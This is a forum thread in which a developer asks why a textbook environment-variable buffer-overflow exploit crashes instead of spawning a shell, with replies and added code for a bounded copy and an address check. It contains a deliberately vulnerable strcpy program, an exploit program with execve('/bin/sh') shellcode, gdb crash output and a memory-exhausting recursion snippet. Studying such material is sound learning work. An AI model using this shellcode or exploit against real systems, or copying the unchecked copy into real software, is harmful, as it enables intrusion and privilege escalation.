I try to understand better how buffer overflow works using the following good document: http://arxiv.org/pdf/cs.CR/0405073 (French language). However, I can't reproduce an easy example (using the environment) of buffer overflow on my system. I tried other basic codes found on the internet and still nothing. Here is my code:

// ---------- vuln2.c
#include <stdio.h>
#include <string.h>   /* strcpy */

int main(int argc, char *argv[])
{
    char buffer[16];
    /* unbounded copy: an argument of 16 or more characters writes past buffer */
    if (argc > 1)
        strcpy(buffer, argv[1]);
    return 0;
}

// ----------- ex2.c
#include <stdio.h>
#include <string.h>   /* strlen */
#include <unistd.h>   /* execle */

#define BUFSIZE 40
#define ALIGNMENT 0

char sc[] = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(void)
{
    char *env[2] = {sc, NULL};   /* sc becomes the only environment string of vuln2 */
    char buf[BUFSIZE];
    int i;
    int *ap = (int *)(buf + ALIGNMENT);
    /* assumes the environment strings end at 0xbffffffa, as the tutorial describes */
    int ret = 0xbffffffa - strlen(sc) - strlen("/home/programming/vuln2");

    /* fill buf with copies of ret; buf is passed as the argument of vuln2 */
    for (i = 0; i < BUFSIZE - 4; i += 4) {
        *ap++ = ret;
    }
    execle("/home/programming/vuln2", "vuln2", buf, NULL, env);
    return 0;
}

If I believe what I learnt, ex2 should provide a new shell:

[user@host]$ ./ex2
Erreur de segmentation (core dumped)
[user@host]$

This is not really the case... Trying to see what happens with gdb:

[user@host]$ gdb -c core.10045
GNU gdb 6.3-5mdk (Mandriva Linux release 2006.0)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandriva-linux-gnu".
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Using host libthread_db library "/lib/tls/libthread_db.so.1".
Loaded system supplied DSO at 0xffffe000
Core was generated by `foo2 Èÿÿ¿Èÿÿ¿Èÿÿ¿Èÿÿ¿Èÿÿ¿Èÿÿ¿Èÿÿ¿Èÿÿ¿Èÿÿ¿'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfffffc8 in ?? ()
(gdb) x/12 0xbfffffc8
0xbfffffc8:     Error accessing memory address 0xbfffffc8: Aucun fichier ou répertoire de ce type.
(gdb) p $eip
$1 = (void *) 0xbfffffc8
(gdb) p $esp
$2 = (void *) 0xbfe8fec0
(gdb) x/12 0xbfe8fec0
0xbfe8fec0:     0xbfffffc8      0xbfffffc8      0xbfffffc8      0x0804844a
0xbfe8fed0:     0x08049654      0x00000000      0xb7f93cc0      0xbfe8ff08
0xbfe8fee0:     0xbfe8fec0      0xb7e4be05      0x00000000      0x00000000
(gdb)

It's as if 0xbffffffa is not the limit address as described. Does somebody understand what is wrong here? For information, my system is Mandriva 2006 with kernel 2.6.12-12mdk-i686-up-4GB.
Hello, I will focus on vuln2 as the other one is too complex for a rookie. This code will crash if you use an argument longer than 15 characters. Simply try this one: ./vuln2 123456789012345678901234567 and you will get a segmentation error. Why? Because the buffer variable can contain only 15 characters. The strcpy() function will add a NULL as well, thus leading to a 16-character string. Now, if you add more than 15 characters to the variable, you will fill up the buffer with your 15 items and the remaining ones will overtake your stack, entering the code module and destroying it; the if (argc > 1) will become unreadable and crash the program. This is a very common programming error as C is very permissive with buffer overflow, unlike other languages. Now in a more complex program, you could imagine exploiting a buffer overflow by injecting code; this is what your second example is showing. Hope this helps. Cheers. Thibaut
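The fix for the error Thibaut describes is a length check before the copy. The following is an added example, not code from the thread: it keeps the 16-byte buffer of vuln2.c, shows the unchecked strcpy pattern next to a bounded copy that refuses anything that does not fit together with its terminating NUL, and reports the overlong argument instead of overwriting the stack. The function names (copy_arg_unsafe, copy_arg_safe, check_arg, max_arg_len) are my own.

```c
#include <stdio.h>
#include <string.h>

#define BUFSIZE 16

/* The pattern from vuln2.c: no length check, so any argument of 16 or more
 * characters writes past the end of buffer (the 16th byte is needed for the NUL).
 * Only safe to call with arguments shorter than BUFSIZE. */
void copy_arg_unsafe(char buffer[BUFSIZE], const char *arg)
{
    strcpy(buffer, arg);            /* overruns when strlen(arg) >= BUFSIZE */
}

/* Hardened form: copy only if arg plus its NUL fits in dstsize bytes.
 * Returns 0 on success, -1 (leaving dst empty) when the input is too long. */
int copy_arg_safe(char *dst, size_t dstsize, const char *arg)
{
    size_t len = strlen(arg);
    if (dstsize == 0)
        return -1;
    if (len >= dstsize) {           /* len + 1 bytes needed, only dstsize available */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, arg, len + 1);      /* copies the terminating NUL as well */
    return 0;
}

/* Longest argument the 16-byte buffer can hold: BUFSIZE - 1 characters. */
size_t max_arg_len(void)
{
    return BUFSIZE - 1;
}

/* Same check as vuln2 would need, with a local buffer of the original size.
 * Returns 0 when the argument fits, -1 when it would have overflowed. */
int check_arg(const char *arg)
{
    char buffer[BUFSIZE];
    return copy_arg_safe(buffer, sizeof buffer, arg);
}

int main(int argc, char *argv[])
{
    char buffer[BUFSIZE];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <argument>\n", argv[0]);
        return 1;
    }
    if (copy_arg_safe(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %zu characters)\n", max_arg_len());
        return 1;
    }
    printf("copied: %s\n", buffer);
    return 0;
}
```

With Thibaut's 27-character argument, the hardened program prints "argument too long (max 15 characters)" and exits instead of crashing; a 15-character argument is copied intact.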
Hello Thibaut. Well, I'm a confirmed C developer and I know about the segfault case. I try to increase my skills by learning everything about buffer overflow: I have no problem exploiting a buffer overflow by trying to find the ret addr and launching the program several times with a different offset, but I can't reproduce the local exploit that should work 100% of tries with the env technique... My problem is I try to understand why every tutorial writes that this exploit code works when it's not working on my computer. I have an idea why this happens and why it's not working, but I don't find any solution in order to exploit vuln2 with a working program that will succeed 100% of tries as taught by the tutorial; probably only people that are used to working in this domain can help me.
Try this. It's C code:

#include <stdio.h>
#include <stdlib.h>

/* unbounded recursion that also allocates 100000 bytes per call and never
   frees them; it runs until the stack or memory is exhausted and the process crashes */
void recursion(void)
{
    malloc(100000);
    recursion();
}

int main(void)
{
    recursion();
    return 0;
}
Yes, of course... I don't really want to crash my memory. If that's all you know about C, just don't reply to this topic.
Probably something like this. It seems that when they did this tutorial the gcc version was prior to 3; a lot of things have changed since... I guess in my environment (because of gcc or the kernel?) 0xbffffffa is no longer the starting address used to store the program name and environment variables. I will go forward in my documentation.
It's easy to check. Simply create a pointer to the beginning of your code and retrieve its address. You should be around the starting address. Cheers. Thibaut
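The check Thibaut suggests, written out as an added example (not code from the thread): it prints where this process's argument and environment strings actually sit and how far they are from a local variable, so the tutorial's assumed end address 0xbffffffa can be compared against reality. It assumes a Linux/glibc system, where `environ` points at the environment block; the helper names (env_block_end, distance_below, self_check) are my own. If the printed addresses change from one run to the next, the kernel randomizes the stack placement, and no fixed address copied from a tutorial can describe the layout of that system.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

extern char **environ;   /* glibc: the process environment block */

/* Highest address used by the environment strings (one past the last NUL),
 * or 0 when the environment is empty. On the classic Linux/x86 layout this lies
 * just below the top of the stack; the tutorial hard-codes 0xbffffffa for it. */
uintptr_t env_block_end(char **envp)
{
    uintptr_t end = 0;
    for (size_t i = 0; envp != NULL && envp[i] != NULL; i++) {
        uintptr_t s_end = (uintptr_t)envp[i] + strlen(envp[i]) + 1;
        if (s_end > end)
            end = s_end;
    }
    return end;
}

/* Bytes between an upper address and a lower one (e.g. a stack local). */
uintptr_t distance_below(uintptr_t top, const void *lower)
{
    return top - (uintptr_t)lower;
}

/* Constructed two-entry environment used to check env_block_end offline:
 * the result must be one past the NUL of whichever string lies higher. */
int self_check(void)
{
    static char a[] = "HOME=/home/user";   /* constructed sample entries */
    static char b[] = "SHELL=/bin/sh";
    char *fake_env[] = { a, b, NULL };
    uintptr_t end_a = (uintptr_t)a + sizeof a;
    uintptr_t end_b = (uintptr_t)b + sizeof b;
    uintptr_t expect = end_a > end_b ? end_a : end_b;
    return env_block_end(fake_env) == expect;
}

int main(int argc, char *argv[])
{
    int local = 0;                            /* a stack variable as reference point */
    uintptr_t top = env_block_end(environ);

    (void)argc;
    printf("argv[0]          : %p\n", (void *)argv[0]);
    printf("environ[0]       : %p\n", environ[0] ? (void *)environ[0] : NULL);
    printf("env block end    : 0x%lx\n", (unsigned long)top);
    printf("&local           : %p\n", (void *)&local);
    printf("tutorial value   : 0xbffffffa\n");
    printf("env end - &local : %lu bytes\n", (unsigned long)distance_below(top, &local));
    return 0;
}
```

Run it a few times in a row and with a different environment size (for example with `env -i ./a.out` and then normally): the env block end moves with the size of the environment and the program name, which is exactly the dependency ex2.c tries to account for by subtracting strlen(sc) and the path length, and it moves between runs on a kernel that randomizes the stack.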